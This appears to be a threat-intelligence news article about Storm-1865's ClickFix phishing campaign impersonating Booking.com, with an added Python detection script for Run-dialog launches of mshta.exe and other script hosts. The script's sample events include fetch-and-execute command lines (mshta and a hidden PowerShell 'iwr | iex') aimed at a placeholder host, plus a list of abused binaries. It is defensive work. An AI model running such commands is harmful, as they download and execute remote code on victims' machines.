A phishing campaign that uses the ClickFix social engineering technique has been targeting hospitality firms by impersonating the travel site Booking.com. Microsoft Threat Intelligence attributes the ongoing campaign to a threat cluster it tracks as Storm-1865.
The primary targets are individuals working in hospitality organizations across North America, Oceania, South and Southeast Asia, and Europe who are likely to interact with Booking.com. ClickFix works by showing the victim a fake error or verification prompt that instructs them to "fix" the problem by running a command themselves; the command is what fetches and installs the malware.
Because the victim types or pastes the command and runs it, there is no malicious attachment or exploit for mail filters and automated controls to catch; the technique relies on a user's willingness to resolve a problem on their own rather than ask their IT department. The malware deployed in this campaign includes XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT, with some samples delivering PowerShell, JavaScript, and portable executable (PE) content.
Microsoft researchers have noted that the ClickFix campaign shares similarities with previous Storm-1865 campaigns, particularly in its method of targeting hotel guests through impersonation of Booking.com. The addition of ClickFix to Storm-1865’s tactics demonstrates the evolution of their approach to circumvent phishing and malware security measures.
The ClickFix campaign initiates with malicious emails sent to targeted individuals, disguised as communications from Booking.com. These emails contain diverse content, ranging from negative guest reviews to account verification requests, enticing recipients to take action by clicking on links or opening PDF attachments supposedly linked to Booking.com.
Clicking the link takes the victim to a fake CAPTCHA page that instructs them to open the Windows Run dialog and execute a command. The command downloads and runs malicious code through mshta.exe, a built-in Windows binary (the HTML Application host), resulting in the installation of malware capable of stealing financial data and credentials.
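The chain above leaves two artifacts a defender can look for: a process-creation event in which explorer.exe (the parent of anything launched from the Run dialog) starts mshta.exe with a URL on its command line, and an entry in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what was typed into Run. The following detection sketch is an added example, not code from Microsoft or from the article; the event fields are modelled on Sysmon Event ID 1, the sample events and registry values are constructed, the hostnames are placeholders, and the inclusion of PowerShell and other script hosts alongside mshta.exe is an assumption that generalizes beyond the mshta.exe-only behaviour the article describes.

```python
"""Flag ClickFix-style launches of mshta.exe (and similar script hosts) from the Run dialog."""
from __future__ import annotations
import re

# Remote content referenced on a command line (http or https).
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# mshta.exe is the binary named in the Storm-1865 campaign; the others are an
# assumed extension covering other ClickFix variants that paste into Run.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "wscript.exe", "cscript.exe"}

ALERT_THRESHOLD = 2  # number of matching indicators needed to raise an alert

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-check.example.invalid/verify.hta"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},  # local HTA, benign
    {"ProcessId": 4207, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://captcha-check.example.invalid/x.ps1 | iex"'},
    {"ProcessId": 4300, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# Constructed RunMRU values; real entries end with a literal "\1" suffix.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": r"mshta https://captcha-check.example.invalid/verify.hta\1",
    "c": r"\\fileserver\share\1",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def first_token(cmdline: str) -> str:
    """Executable named at the start of a Run-dialog command, normalised to name.exe."""
    stripped = cmdline.strip()
    if not stripped:
        return ""
    token = stripped.split(maxsplit=1)[0].strip('"').lower()
    if not token.endswith(".exe"):
        token += ".exe"
    return basename(token)


def score_process_event(event: dict) -> tuple:
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in LOLBINS:
        return 0, reasons
    if URL_RE.search(cmdline):
        reasons.append(f"{image} given a remote URL on its command line")
        if image == "mshta.exe":
            reasons.append("mshta.exe fetching a remote HTA, the pattern used by the Booking.com lure")
    if parent == "explorer.exe":
        reasons.append("parent is explorer.exe, consistent with a launch from the Run dialog")
    return len(reasons), reasons


def find_alerts(events: list) -> list:
    """Return (ProcessId, score, reasons) for every event at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_process_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev.get("ProcessId"), score, reasons))
    return alerts


def scan_runmru(values: dict) -> list:
    """Return RunMRU commands that invoke a script host with a remote URL."""
    hits = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if first_token(cmd) in LOLBINS and URL_RE.search(cmd):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for pid, score, reasons in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} score={score}: " + "; ".join(reasons))
    for cmd in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU hit: {cmd}")
```

The scoring deliberately requires more than one indicator: mshta.exe opening a local HTA from explorer.exe (the second sample) scores 1 and is not reported, while a remote HTA launched from Run scores 3. The RunMRU check is useful in incident response because the key survives after the process has exited, and it is also what a user would have seen in the Run box when they pasted the attacker's command.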
The stolen information is then transmitted over a command and control channel, allowing cybercriminals to execute follow-up attacks, including fraudulent financial transactions. While Booking.com has confirmed that its systems have not been breached, some accommodation partners and customers have fallen victim to phishing attacks as a result of the campaign.
In response, Booking.com has emphasized the importance of verifying payment details and avoiding sharing sensitive information via email, chat messages, or phone calls. The company is actively working to educate its partners and customers about potential scams and provide guidance on staying protected while booking holidays.
Because ClickFix depends on the victim running the command, user awareness matters as much as technical controls: staff should treat any page or email that asks them to paste a command into the Run dialog as malicious, and organizations should monitor and, where possible, restrict interactive use of mshta.exe and similar script hosts. Together with the payment-verification advice above, these measures reduce the risk posed by campaigns like this one.